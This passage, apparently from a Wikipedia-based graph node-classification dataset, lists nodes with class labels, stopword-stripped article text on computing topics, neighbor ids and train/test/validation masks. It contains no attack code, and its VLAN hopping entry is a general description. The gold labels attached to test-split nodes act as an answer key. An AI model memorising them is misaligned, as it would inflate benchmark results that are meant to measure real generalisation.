      10820,
      6539,
      10747,
      5371
    ],
    "mask": "None"
  },
  {
    "node_id": 4978,
    "label": 2,
    "text": "Arch_Hurd:arch hurd arch hurd operating system based arch linux uses gnu hurd kernel instead linux kernel arch hurd project founded arch linux forum thread january 2010 weeks many contributions progressed point could boot virtual machine aims provide arch-like user environment bsd-style init scripts i686-optimised packages use pacman package manager rolling-release kiss set hurd stable enough use despite small development team much progress made since founding booting real hardware packaging everything basic web server production unofficial graphical livecd june 2011 arch hurd announced successful integration device driver environment dde — framework linux drivers hurd improves network hardware support distribution makes nearly usable",
    "neighbors": [
      10016,
      6371,
      3684,
      2180,
      5067,
      7983,
      10257,
      5363,
      7187,
      5397,
      3068
    ],
    "mask": "None"
  },
  {
    "node_id": 4979,
    "label": 8,
    "text": "OASIS_(organization):oasis organization organization advancement structured information standards oasis global nonprofit consortium works development convergence adoption open standards security internet things energy content technologies emergency management areas oasis founded name sgml open 1993 began trade association sgml tool vendors cooperatively promote adoption standard generalized markup language sgml mainly educational activities though amount technical activity also pursued including update cals table model specification specifications fragment interchange entity management 1998 movement high tech industry xml sgml open changed emphasis sgml xml changed name oasis open inclusive xml reflect expanded scope technical work standards focus consortium activities also moved promoting adoption xml getting lots attention developing technical specifications july 2000 new technical committee process approved adoption process manner technical committees created operated progressed work regularized adoption process five technical committees 2004 nearly 70 1999 oasis approached un/cefact committee united nations dealing standards business jointly develop new set specifications electronic business joint initiative called ebxml first met november 1999 chartered three-year period final meeting original charter vienna un/cefact oasis agreed divide remaining work two organizations coordinate completion work coordinating committee 2004 oasis submitted completed ebxml specifications iso tc154 approved iso 15000 consortium headquarters burlington massachusetts shared companies september 4 2014 consortium moved 25 corporate drive suite 103 35 corporate dr suite 150 still loop route following standards development oasis technical committees adhesion consortium requires fees paid must renewed annually depending membership category adherents want access among adherents members american bar association collabora dell eclecticiq general motors ibm iso/iec kde e.v. microsoft novell oracle redhat document foundation universities government agencies individuals employees less-known companies like many bodies producing open standards e.g ecma oasis added reasonable non-discriminatory licensing rand clause policy february 2005 amendment required participants disclose intent apply software patents technologies consideration standard contrary w3c requires participants offer royalty-free licenses anyone using resulting standard oasis offers similar royalty free limited terms mode along royalty free rand terms mode rand reasonable non-discriminatory mode committees compared w3c oasis less restrictive regarding obligation companies grant royalty-free license patents controversy rapidly arisen licensing added silently allows publication standards could require licensing fee payments patent holders situation could effectively eliminate possibility free/open source implementations standards contributors could initially offer royalty-free use patent later imposing per-unit fees standard accepted april 11 2005 new york times reported ibm committed free patents oasis group larry rosen software law expert leader reaction rose oasis quietly included rand clause policy welcomed initiative supposed oasis continue using policy companies involved would follow history proved wrong rand policy still removed commercial companies published free statement towards oasis patrick gannon president ceo oasis 2001 2008 minimized risk company could take advantage standard request royalties established option nobody uses harm sam hiser former marketing lead defunct openoffice.org explained patents towards open standard counterproductive inappropriate also argued ibm microsoft shifting standardization efforts w3c oasis way leverage probably patents portfolio future hiser also attributed rand change oasis policy microsoft rand term could indeed theoretically allow company involved leverage patent future amendment probably added way attract companies consortium encourage contributions potential participants big actors like microsoft could indeed applied pressure made sine-qua-non condition access consortium possibly jeopardize/boycott standard clause present doug mahugh — working microsoft promoter office open xml microsoft document format competing oasis iso/iec 26300 i.e odf v1.0 senior product manager specializing office client interoperability — claimed many countries expressed frustration pace oasis responses defect reports submitted iso/iec 26300 inability sc 34 members participate maintenance odf however rob weir co-chair oasis odf technical committee noted time odf tc received zero defect reports iso/iec national body japan added submitter original japanese defect report murata mokoto satisfied preparation errata also self-published blog post blaming microsoft involving people improve modify accuracy odf openxml wikipedia articles trying make odf sound risky adopt",
    "neighbors": [
      1280,
      4107,
      8203,
      3086,
      6805,
      9365,
      7320,
      6811,
      7198,
      10020,
      425,
      10409,
      4397,
      8626,
      5433,
      8764,
      5443,
      2501,
      2118,
      7368,
      7800,
      10829,
      6353,
      6993,
      5460,
      5463,
      90,
      2013,
      349,
      479,
      4064,
      6366,
      7522,
      489,
      5996,
      3693,
      9455,
      2932,
      10486,
      6007,
      1400,
      3323,
      7165
    ],
    "mask": "Test"
  },
  {
    "node_id": 4980,
    "label": 9,
    "text": "Program_transformation:program transformation program transformation operation takes computer program generates another program many cases transformed program required semantically equivalent original relative particular formal semantics fewer cases transformations result programs semantically differ original predictable ways transformations performed manually often practical use program transformation system applies specifications required transformations program transformations may specified automated procedures modify compiler data structures e.g abstract syntax trees representing program text may specified conveniently using patterns templates representing parameterized source code fragments practical requirement source code transformation systems able effectively process programs written programming language usually requires integration full front-end programming language interest including source code parsing building internal program representations code structures meaning program symbols useful static analyses regeneration valid source code transformed program representations problem building integrating adequate front ends conventional languages java c++ php etc may equal difficulty building program transformation system complexity languages widely useful transformation system must able handle many target programming languages must provide means specifying front ends generalisation semantic equivalence notion program refinement one program refinement another terminates initial states original program terminates state guaranteed terminate possible final state original program words refinement program defined deterministic original program two programs refinements programs equivalent",
    "neighbors": [
      10762,
      1552,
      4112,
      3475,
      1685,
      5399,
      3363,
      932,
      4519,
      5677,
      2619,
      3263,
      8644,
      8773,
      2374,
      8262,
      9926,
      10703,
      5585,
      11475,
      2262,
      605,
      7780,
      10469,
      10983,
      10474,
      2927,
      5496
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4981,
    "label": 9,
    "text": "Bill_Gosper:bill gosper ralph william gosper jr. born april 26 1943 known bill gosper american mathematician programmer along richard greenblatt may considered founded hacker community holds place pride lisp community high school gosper interested model rockets one friends injured rocketry accident contracted fatal brain infection gosper enrolled mit 1961 received bachelor degree mathematics mit 1965 despite becoming disaffected mathematics department anti-computer attitude second year mit gosper took programming course john mccarthy became affiliated mit ai lab contributions computational mathematics include hakmem mit maclisp system made major contributions macsyma project mac computer algebra system gosper later worked symbolics macsyma inc. commercial versions macsyma 1974 moved stanford university lectured worked donald knuth since time worked consulted xerox parc symbolics wolfram research lawrence livermore laboratory macsyma inc became intensely interested game life shortly john horton conway proposed conway conjectured existence infinitely growing patterns offered reward example gosper first find pattern glider gun prize gosper also originator hashlife algorithm speed computation life patterns many orders magnitude gosper created numerous packing problem puzzles twubblesome twelve gosper first person realize possibilities symbolic computation computer mathematics research tool whereas computer methods previously limited purely numerical methods particular research resulted work continued fraction representations real numbers gosper algorithm finding closed form hypergeometric identities 1985 gosper briefly held world record computing digits pi 17 million digits see chronology computation π",
    "neighbors": [
      4992,
      1443,
      2798,
      5361,
      2135,
      10104,
      989,
      4799
    ],
    "mask": "Test"
  },
  {
    "node_id": 4982,
    "label": 6,
    "text": "VMware_VMFS:vmware vmfs vmware vmfs virtual machine file system vmware inc. clustered file system used company flagship server virtualization suite vsphere developed store virtual machine disk images including snapshots multiple servers read/write filesystem simultaneously individual virtual machine files locked vmfs volumes logically grown non-destructively increased size spanning multiple vmfs volumes together five plus one vsan versions vmfs corresponding esx/esxi server product releases java open source vmfs driver enables read-only access files folders partitions formatted virtual machine file system vmfs developed maintained fluid operations ag allows features like offloaded backups virtual machines hosted vmware esxi hosts vmfsv3 based fluidops code vmfs-tools evolved add vmfs features supports read vmfs mounts standard linux vfs fuse framework developed christophe fillot mike hommey available source code download glandium.org vmfs-tools page debian vmfs-tools ubuntu vmfs-tools packages",
    "neighbors": [
      9762,
      6309,
      6153,
      2314,
      492,
      5677,
      7983,
      819,
      823,
      8410,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 4983,
    "label": 5,
    "text": "Link_Quality_Report:link quality report link quality report lqr protocol part point-to-point protocol ppp allows two computers connect lqr allows peers either end ppp link assess state quality ppp link lqr transmits counts packets sent received rejected errors report signal noise attenuation order produce link quality reports ppp peer implement link quality monitoring link quality monitoring consists maintaining number counters counters include use lqrs negotiated ppp link first established peer wants receive lqr packets signals sending ppp configuration option following data lqr one packet containing counters well addition receiving peer add following fields lqr packet arrives numbers come mib database ppp receive logic maintains saved use next lqr packet peer sends number ppp implementations cause errors lqr generation implementations negotiate correctly lqrs fail send leads local peer determining ppp link failed led users using less capable lcp echos detect whether link still functioning lcp echos provide information lqr could provide",
    "neighbors": [
      8432
    ],
    "mask": "None"
  },
  {
    "node_id": 4984,
    "label": 1,
    "text": "SciELO:scielo scielo scientific electronic library online bibliographic database digital library cooperative electronic publishing model open access journals scielo created meet scientific communication needs developing countries provides efficient way increase visibility access scientific literature originally established brazil 1997 today 16 countries scielo network journal collections argentina bolivia brazil chile colombia costa rica cuba ecuador mexico paraguay peru portugal south africa spain uruguay venezuela scielo initially supported são paulo research foundation fapesp brazilian national council scientific technological development cnpq along latin american caribbean center health sciences information bireme scielo provides portal integrates provides access scielo network sites users search across scielo collections limit single country collection browse subject area publisher journal title october 2015 database contained different countries universally accessible free open access full-text format scielo project stated aims envisage development common methodology preparation storage dissemination evaluation scientific literature electronic format journals published special software suite implements scientific electronic virtual library accessed via several mechanisms including table titles alphabetic subject list subject author indexes search engine project launch timeline 2013 latin american scielo project completed 15 years free publishing open access long emphasized access scholarly materials however open access also mean access means producing visible recognized journals issue particularly important developing emergent countries benefits challenges publishing scientific journals emerging countries articles sent scielo publishers xml html+sgml using variety article dtds sgml dtd used 2013 scielo started offer journal article tag suite jats dtd standard xml deposites using markup xml macro proprietary desktop application microsoft office word docx scielo portals received jats-articles converted via xslt html sgml+html pack articles use html content general handmade pdf-to-html conversion process may reveal errors reported back publisher correction graphics also converted standard formats sizes original converted forms archived converted form moved relational database along associated files graphics multimedia associated data many publishers also provide pdfs articles made available without change bibliographic citations sgml xml parsed automatically linked associated articles scielo resources publishers web sites unresolvable references journals particular articles yet available one sources tracked database automatically come live resources become available in-house indexing system provides search capability july 2015 jeffrey beall american librarian posted article blog referring two largest latin american open access databases scielo redalyc favelas derogatory portuguese term slum beall stated many north american scholars never even heard meta-publishers journals aggregate content largely hidden neighborhood remote unfamiliar among responses motion passed brazilian forum public health journals editors associação brasileira de saúde coletiva abrasco brazilian public health association motion takes exception beall characterization draws attention underlying ethnocentric prejudice corrects factual inaccuracies counterpoint beall neocolonial point view motion draws attention work vessuri guedon cetto emphasizing value initiatives scielo redalyc also targeted beall development science latin america globally fact latin america using oa publishing model far greater extent region world… also sense public mission remains strong among latin american universities… current initiatives demonstrate region contributes global knowledge exchange positioning research literature public good",
    "neighbors": [
      10401,
      10759,
      8627,
      502,
      8539,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4985,
    "label": 9,
    "text": "DYNAMO_(programming_language):dynamo programming language dynamo dynamic models historically important simulation language accompanying graphical notation developed within system dynamics analytical framework originally industrial dynamics soon extended applications including population resource studies urban planning dynamo initially developed direction jay wright forrester late 1950s dr. phyllis fox alexander l. pugh iii grace duren others m.i.t computation center dynamo used system dynamics simulations global resource-depletion reported club rome limits growth since fallen disuse 1958 forrester unwittingly instigated dynamo development asked mit staff programmer compute needed solutions equations harvard business review paper writing industrial dynamics programmer richard bennett chose implement system simple simulation industrial management problems lots equations took coded equations symbolic input computed solutions simple became proof-of-concept dynamo rather specialist programmer hard-code special-purpose solver general purpose programming language users could specify system equations special simulation language get simulation output one program execution dynamo designed emphasize following among ways dynamo standard time featured units checking numerical types relatively clear error messages earliest versions written assembly language ibm 704 ibm 709 ibm 7090 dynamo ii written aed-0 extended version algol 60 dynamo ii/f 1971 generated portable fortran code dynamo ii/f dynamo iii improved system portability written fortran originally designed batch processing mainframe computers made available minicomputers late 1970s became available micro-dynamo personal computers early 1980s language went several revisions dynamo ii dynamo iv 1983 apart indirectly felt public impact environmental issues raised controversy limits growth dynamo influential history discrete-event simulation even though essentially package continuous simulation specified difference equations said opened opportunities computer modelling even users relatively low mathematical sophistication hand also criticized weak precisely mathematical sophistication required relying euler integration",
    "neighbors": [
      4492,
      5775,
      3408,
      5277,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 4986,
    "label": 4,
    "text": "The_Art_of_Deception:art deception art deception book kevin mitnick covers art social engineering part book composed real stories examples social engineering combined hacking nearly examples fictional quite plausible expose ease skilled social engineer subvert many rules people take granted examples book also giving example tell tricked/conned victims scam prevent real life business book ends mitnick strategy business plans prevent scams book",
    "neighbors": [
      4435,
      4956,
      7927
    ],
    "mask": "None"
  },
  {
    "node_id": 4987,
    "label": 4,
    "text": "Software_fault_tolerance:software fault tolerance software fault tolerance ability computer software continue normal operation despite presence system hardware faults fault-tolerant software ability satisfy requirements despite failures thing constant change certainly true software systems almost phenomenon software change way software fault tolerance methods designed overcome execution errors modifying variable values create acceptable program state need control software fault one rising challenges facing software industries today fault tolerance must key consideration early stage software development exist different mechanisms software fault tolerance among computer applications make call using application programming interface api access shared resources like keyboard mouse screen disk drive network printer fail two ways blocked call request services operating system halts computer program results available example tcp call blocks response becomes available remote server occurs every time perform action web browser intensive calculations cause lengthy delays effect blocked api call two methods used handle blocking threading allows separate sequence execution api call block prevent overall application stalling waiting resource benefit none information state api call lost activities take place threaded languages include following timers allow blocked call interrupted periodic timer allows programmer emulate treading interrupts typically destroy information related state blocked api call intensive calculation programmer must keep track information separately un-threaded languages include following corrupted state occur timers avoided following fault induced signals posix compliant systems signals originate api calls operating system applications signal handler code becomes fault causes premature application termination handler function performed on-demand application receives signal called exception handling termination signal signal handled signals directed handler function handler functions come two broad varieties initialized handler functions paired signal software starts causes handler function startup corresponding signal arrives technique used timers emulate threading in-line handler functions associated call using specialized syntax familiar following used c++ java hardware fault tolerance software requires following backup maintains information event hardware must replaced done one two ways backup requires information-restore strategy make backup information available replacement system restore process usually time-consuming information unavailable restore process complete redundancy relies replicating information one computer computing device recovery delay brief achieved using continuous backup live system remains inactive needed synchronized backup also achieved replicating information created multiple identical systems eliminate recovery delay",
    "neighbors": [
      2592,
      3366
    ],
    "mask": "None"
  },
  {
    "node_id": 4988,
    "label": 4,
    "text": "Canadian_Trusted_Computer_Product_Evaluation_Criteria:canadian trusted computer product evaluation criteria canadian trusted computer product evaluation criteria ctcpec computer security standard published 1993 communications security establishment provide evaluation criterion products combination tcsec also called orange book european itsec approaches ctcpec led creation common criteria standard canadian system security centre part communications security establishment founded 1988 establish canadian computer security standard",
    "neighbors": [
      8904,
      4067,
      2558,
      10467
    ],
    "mask": "None"
  },
  {
    "node_id": 4989,
    "label": 9,
    "text": "Revolution_(software_platform):revolution software platform revolution software development environment/multimedia authoring software tradition hypercard based metacard engine primary focus providing relatively accessible development tool set scripting language enable creation software programs run across multiple platforms little code modifications integrated development environment ide included revolution built partly models created bill atkinson original hypercard team apple subsequently followed many software development products microsoft visual basic revolution includes english language-like scripting language called transcript full programming language superset hypercard scripting language hypertalk higher-grade versions see versions allow applications compiled run one platform including macintosh classic mac os 9 mac os x windows unix-like systems including linux also import hypercard stacks require little modification unless use external functions generally work revolution revolution designed environment non-programmers feel ease programmers feel uncomfortable getting used non-traditional programming syntax like programming language development environment opinions degree aims achieved vary greatly revolution 2 starter kit version available freeware imposed restrictions user allowing scripts longer ten lines compiled however since discontinued longer available download dreamcard version intended home users/hobbyists applications called stacks built using require either dreamcard player full copy revolution run dreamcard include revolution compiler studio version powerful useful creating professional binary applications enterprise version probably expensive casual users compared similar products borland delphi kylix priced competitively one wishes develop programs non-microsoft platforms cross-platform deployment revolution one small handful commercially supported options revolution derived metacard engine metacard stacks 100 compatible revolution however way around necessarily true hypercard stacks run externals run macs supercard stacks must run converter upgraded revolution/metacard format revolution runs mac classic mac os x windows 9x/nt/2000/xp following unix variants standalone applications written revolution run well windows 3.1 limitations march 2005 dreamcard player runs windows mac os classic x linux linux user gnome/xfce/gtk+ theme used gtk+ installed otherwise motif look used mac appearance manager used available otherwise platinum look used windows xp theme standard widgets used users preview motif platinum windows appearance platform many companies groups use revolution engine mainly used freelance programmers make small widgets libraries one example used exclusively christa mcauliffe space education center",
    "neighbors": [
      5506,
      10051,
      10436,
      1542,
      4486,
      4844,
      1389,
      6797,
      847,
      499,
      9780,
      5397,
      823,
      1304,
      3167,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 4990,
    "label": 4,
    "text": "VLAN_hopping:vlan hopping vlan hopping computer security exploit method attacking networked resources virtual lan vlan basic concept behind vlan hopping attacks attacking host vlan gain access traffic vlans would normally accessible two primary methods vlan hopping switch spoofing double tagging attack vectors mitigated proper switch port configuration switch spoofing attack attacking host imitates trunking switch speaking tagging trunking protocols e.g multiple vlan registration protocol ieee 802.1q dynamic trunking protocol used maintaining vlan traffic multiple vlans accessible attacking host switch spoofing exploited interfaces set negotiate trunk prevent attack cisco ios use one following methods 1 ensure ports set negotiate trunks automatically disabling dtp 2 ensure ports meant trunks explicitly configured access ports double tagging attack attacker connected 802.1q-enabled port prepends two vlan tags frame transmits frame externally tagged vlan id attacker port really member forwarded without first tag native vlan trunk interface second tag visible second switch frame encounters second vlan tag indicates frame destined target host second switch frame sent target host though originated target vlan effectively bypassing network mechanisms logically isolate vlans one another however possible replies forwarded attacking host unidirectional flow double tagging exploited switch ports configured use native vlans trunk ports configured native vlan n't apply vlan tag sending frames allows attacker fake vlan tag read next switch double tagging mitigated following actions incl ios example example double tagging attack consider secure web server vlan called vlan2 hosts vlan2 allowed access web server hosts outside vlan2 blocked layer 3 filters attacking host separate vlan called vlan1 native creates specially formed packet attack web server places header tagging packet belonging vlan2 header tagging packet belonging vlan1 packet sent switch sees default vlan1 header removes forwards packet next switch sees vlan2 header puts packet vlan2 packet thus arrives target server though sent another host vlan2 ignoring layer 3 filtering might place",
    "neighbors": [
      3473,
      10905,
      939
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4991,
    "label": 3,
    "text": "Druid_(video_game):druid video game druid action-adventure game developed electralyte software published firebird 1986 atari 8-bit family commodore 64 also ported amstrad cpc zx spectrum game ported nippon dexter msx japan-only 1988 another japanese port druid entitled made famicom disk system jaleco 1988 game followed inspired arcade game gauntlet druid fantasy-themed action-adventure game player plays part hasrinaxx druid trying rid world dark mage acamantor army demons hasrinaxx must travel several levels first level normal landscape ones underground one deeper previous level infested various enemies ghosts giant insects witches four demon princes hasrinaxx shoot enemies three different weapons water fire electricity come finite supply equally effective enemies using chaos spell destroy enemies player vicinity well replenishing energy four demon princes defeated chaos spell common weapons ineffective hasrinaxx also summon golem help turn invisible brief period commodore 64 version second player take control golem using joystick port 2",
    "neighbors": [
      7536,
      5340,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4992,
    "label": 9,
    "text": "Richard_Greenblatt_(programmer):richard greenblatt programmer richard d. greenblatt born december 25 1944 american computer programmer along bill gosper may considered founded hacker community holds place distinction communities programming language lisp massachusetts institute technology mit artificial intelligence laboratory greenblatt born portland oregon december 25 1944 family moved philadelphia pennsylvania child later moved columbia missouri mother sister parents divorced greenblatt enrolled mit fall 1962 around second term undergraduate student found way mit famous tech model railroad club time peter samson written program fortran ibm 709 series machines automate tedious business writing intricate timetables railroad club vast model train layout greenblatt felt compelled implement fortran compiler pdp-1 lacked one computer time available debug compiler even type computer years later elements compiler combined ideas fellow tmrc member steven piner author early pdp-4 fortran compiler working digital equipment corporation typed showed signs life however perceived need fortran compiler evaporated compiler pursued experiences tmrc especially influence alan kotok worked dec junior partner design team pdp-6 computer led greenblatt ai lab proceeded become hacker hacker noted programming acumen described steven levy acknowledged gerald jay sussman harold abelson said fortunate apprentice programmers feet bill gosper richard greenblatt indeed spent much time programming programmed data processor pdp machines failed mit first-term junior take job firm charles adams associates ai lab hired 6 months later 1979 tom knight main designers mit lisp machine founded lisp machines inc. later renamed gigamos systems according vision ideal hacker-friendly computer company opposed commercial ideals symbolics main implementor maclisp pdp-6 wrote mac hack first computer program play tournament-level chess first compete human chess tournament ai skeptic hubert dreyfus famously made claim computers would able play high-quality chess beaten program marking start respectable computer chess performances 1977 unbeaten chess champion bobby fischer played three games cambridge massachusetts greenblatt computer program fischer greenblatt along tom knight stewart nelson co-wrote incompatible timesharing system highly influential time-sharing operating system pdp-6 pdp-10 used mit",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      80,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      1147,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1804,
      1301,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      11075,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      4981,
      3446,
      3960,
      377,
      10104,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      989,
      3051,
      5611,
      7670,
      11255,
      504
    ],
    "mask": "None"
  },
  {
    "node_id": 4993,
    "label": 5,
    "text": "Binkp:binkp binkp protocol transferring fidonet wwivnet mail reliable connections typically used deliver mail internet instead point-to-point connections modems historically fidonet traffic transferred mainly serial rs-232 modem connections might error correction layer dial-up-oriented protocols transferring fidonet traffic like emsi zmodem implement error-recovery members fidonet started use tcp/ip transfer fidonet traffic error-recovery overhead became unnecessary assuming connection reliable makes possible eliminate error-checking unnecessary synchronization steps achieving ease implementation improved performance major advantage binkp vs emsi zmodem achieved connections large delays low bandwidth iana internet assigned numbers authority registered port number 24554 binkp used tcp/ip connections",
    "neighbors": [
      6993,
      1121
    ],
    "mask": "Train"
  },
  {
    "node_id": 4994,
    "label": 4,
    "text": "AV-Comparatives:av-comparatives av-comparatives austrian independent organization tests assesses antivirus software regularly releasing charts reports freely available public media antivirus vendors meet various requirements regarding trustworthiness reliability order take part tests av-comparatives issues relevant awards based antivirus software comprehensive performance according multiple testing criteria also supported university innsbruck academic bodies around world well austrian federal government regional government tirol av-comparatives real world protection test test environment closely approximates well antivirus product protect real-world users test results released monthly march june august november two detailed overall result reports released june december real world protection test framework recognized “ standortagentur tirol ” 2012 cluster award innovation computer science 2018 av-comparatives started large scale enterprise security software test series consisting real-world test false alarm test malware protection test performance test well review av-comparatives provided undroid apk analyzer free service website users since may 2013 designed android smartphone users provides static analysis android apps users upload android application package apk receive quick online analysis containing file hashes graphical danger level additional information",
    "neighbors": [
      5057,
      2213,
      1417,
      202,
      43,
      6699,
      6797,
      8493,
      8940,
      4464,
      9713,
      4659,
      10708,
      823,
      1242,
      2654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4995,
    "label": 2,
    "text": "Google_Assistant:google assistant google assistant artificial intelligence-powered virtual assistant developed google primarily available mobile smart home devices unlike company previous virtual assistant google google assistant engage two-way conversations assistant initially debuted may 2016 part google messaging app allo voice-activated speaker google home period exclusivity pixel pixel xl smartphones began deployed android devices february 2017 including third-party smartphones android wear wear os released standalone app ios operating system may 2017 alongside announcement software development kit april 2017 assistant extended support large variety devices including cars third party smart home appliances functionality assistant also enhanced third-party developers 2017 google assistant installed 400 million devices users primarily interact google assistant natural voice though keyboard input also supported nature manner google assistant able search internet schedule events alarms adjust hardware settings user device show information user google account google also announced assistant able identify objects gather visual information device camera support purchasing products sending money well identifying songs ces 2018 first assistant-powered smart displays smart speakers video screens announced first one released july 2018 google assistant unveiled google developer conference may 18 2016 part unveiling google home smart speaker new messaging app allo google ceo sundar pichai explained assistant designed conversational two-way experience ambient experience extends across devices later month google assigned google doodle leader ryan germick hired former pixar animator emma coats develop little personality system-level integration outside allo app google home google assistant initially exclusive pixel pixel xl smartphones february 2017 google announced begun enable access assistant android smartphones running android marshmallow nougat beginning select english-speaking markets android tablets receive assistant part rollout assistant also integrated android wear 2.0 included future versions android tv android auto october 2017 google pixelbook became first laptop include google assistant google assistant later came google pixel buds december 2017 google announced assistant would released phones running android lollipop update google play services well tablets running 6.0 marshmallow 7.0 nougat february 2019 google reportedly began testing ads google assistant results may 15 2017 android police reported google assistant would coming ios operating system separate app information confirmed two days later google developer conference january 2018 consumer electronics show first assistant-powered smart displays released smart displays shown event lenovo sony jbl lg devices support google duo video calls youtube videos google maps directions google calendar agenda viewing smart camera footage addition services work google home devices devices based android things google-developed software google unveiled smart display google home hub october 2018 utilizes different system platform december 2016 google launched actions google developer platform google assistant actions google allows 3rd party developers build apps google assistant march 2017 google added new tools developing actions google support creation games google assistant originally limited google home smart speaker actions google made available android ios devices may 2017 time google also introduced app directory overview compatible products services incentivize developers build actions google announced competition first place tickets google 2018 developer conference 10,000 walk-through google campus second place third place received 7,500 5,000 respectively google home april 2017 software development kit sdk released allowing third-party developers build hardware run google assistant integrated raspberry pi cars audi volvo smart home appliances including fridges washers ovens companies including irobot lg general electric d-link google updated sdk december 2017 add several features google home smart speakers google assistant smartphone apps previously supported features include may 2 2018 google announced new program blog focuses investing future google assistant early-stage startups focus build environment developers could build richer experiences users includes startups broaden assistant features building new hardware devices simply differentiating different industries google assistant nature manner google search internet schedule events alarms adjust hardware settings user device show information user google account unlike google however assistant engage two-way conversation using google natural language processing algorithm search results presented card format users tap open page february 2017 google announced users google home would able shop entirely voice products google express shopping service products available whole foods market costco walgreens petsmart bed bath beyond launch retailers added following months new partnerships formed google assistant maintain shopping list previously done within notetaking service google keep feature moved google express google home app april 2017 resulting severe loss functionality may 2017 google announced assistant would support keyboard typed input visual responses support identifying objects gather visual information device camera support purchasing products sending money use keyboard users see history queries made google assistant edit delete previous inputs assistant warns deleting however due use previous inputs generate better answers future november 2017 became possible identify songs currently playing asking assistant.. google assistant allows users activate modify vocal shortcut commands order perform actions device android ipad/iphone configuring hub home automation feature speech recognition available english among languages july 2018 google home version assistant gained support multiple actions triggered single vocal shortcut command annual i/o developers conference may 8 2018 google seo announced addition six new voice options google assistant one john legend made possible wavenet voice synthesizer developed deepmind significantly reduced amount audio samples voice actor required produce creating voice model august 2018 google added bilingual capabilities google assistant existing supported languages devices recent reports say may support multilingual support setting third default language android phone default option google assistant n't support two common features speech recognition transcribed texts like punctuation spelling however beta feature speech-to-text enables en-us language users ask detect insert punctuation transcription results speech-to-text recognize commas question marks periods transcription requests april 2019 popular audio games assistant crystal ball lucky trivia biggest voice change software history voice assistant able add expression games instance crystal ball game voice would speak slow soft intro answer revealed make game excitable lucky trivia game voice would become excitable like game show host british accent voice crystal ball voice would say word 'probably downwards slide like sure games used text speech voice makes voice robotic may 2019 however turned bug speech api caused games lose studio quality voices audio games fixed may 20th 2019 may 2018 google revealed duplex extension google assistant allows carry natural conversations mimicking human voice manner dissimilar robocalling assistant autonomously complete tasks calling hair salon book appointment scheduling restaurant reservation calling businesses verify holiday store hours duplex complete tasks fully autonomously able recognize situations unable complete signal human operator finish task duplex created speak natural voice language incorporating speech disfluencies filler words like hmm uh using common phrases mhm gotcha along human-like intonation response latency duplex currently development limited release late 2018 google pixel users limited release pixel phone users atlanta new york phoenix san francisco able use duplex make restaurant reservations announcement concerns made ethical societal questions artificial intelligence technology duplex raises instance human operators may notice speaking digital robot conversing duplex critics view unethical deceitful concerns privacy also identified conversations duplex recorded order virtual assistant analyze respond privacy advocates also raised concerns millions vocal samples gathered consumers fed back algorithms virtual assistants making forms ai smarter use though features individualize user experience critics unsure long term implications giving company unprecedented access human patterns preferences crucial next phase artificial intelligence could potentially lead ai outsmarting creators transparency referred key part experience technology revealed google later clarified statement saying designing feature disclosure built-in 'll make sure system appropriately identified google added certain jurisdictions assistant would inform end phone call recorded pc world mark hachman gave favorable review google assistant saying step cortana siri digital trends called smarter google ever july 2019 belgian public broadcaster vrt nws published article revealing 3rd party contractors paid transcribe audio clips collected google assistant listened sensitive information users sensitive data collected google home devices android phones included names addresses private conversations business calls bedroom conversations 1000 recordings analysed 153 recorded without ‘ okay google ’ command google officially acknowledged 0.2 recordings listened language experts improve google services august 1 2019 germany ’ hamburg commissioner data protection freedom information initiated administrative procedure prohibit google carrying corresponding evaluations employees third parties period three months provisionally protect rights privacy data subjects time citing gdpr google spokesperson stated google paused “ language reviews ” european countries investigated recent media leaks google assistant new feature google assistant supported languages",
    "neighbors": [
      4096,
      516,
      5637,
      8719,
      3600,
      4624,
      7700,
      9244,
      11294,
      1578,
      10284,
      2605,
      3633,
      9779,
      6208,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      7780,
      8821,
      11391,
      1670,
      8326,
      7816,
      5262,
      6800,
      11408,
      9366,
      10393,
      8858,
      7835,
      673,
      7841,
      7333,
      8870,
      10921,
      6827,
      9901,
      1203,
      7359,
      196,
      3269,
      3782,
      5319,
      10445,
      3795,
      2263,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      2804,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3886,
      7983,
      5431,
      1849,
      2875,
      3900,
      10045,
      10557,
      321,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      5467,
      4957,
      3940,
      9063,
      5483,
      6001,
      7548,
      8576,
      1409,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      8098,
      1959,
      937,
      6057,
      3499,
      428,
      7595,
      4044,
      4048,
      2001,
      477,
      8675,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252
    ],
    "mask": "Test"
  },
  {
    "node_id": 4996,
    "label": 2,
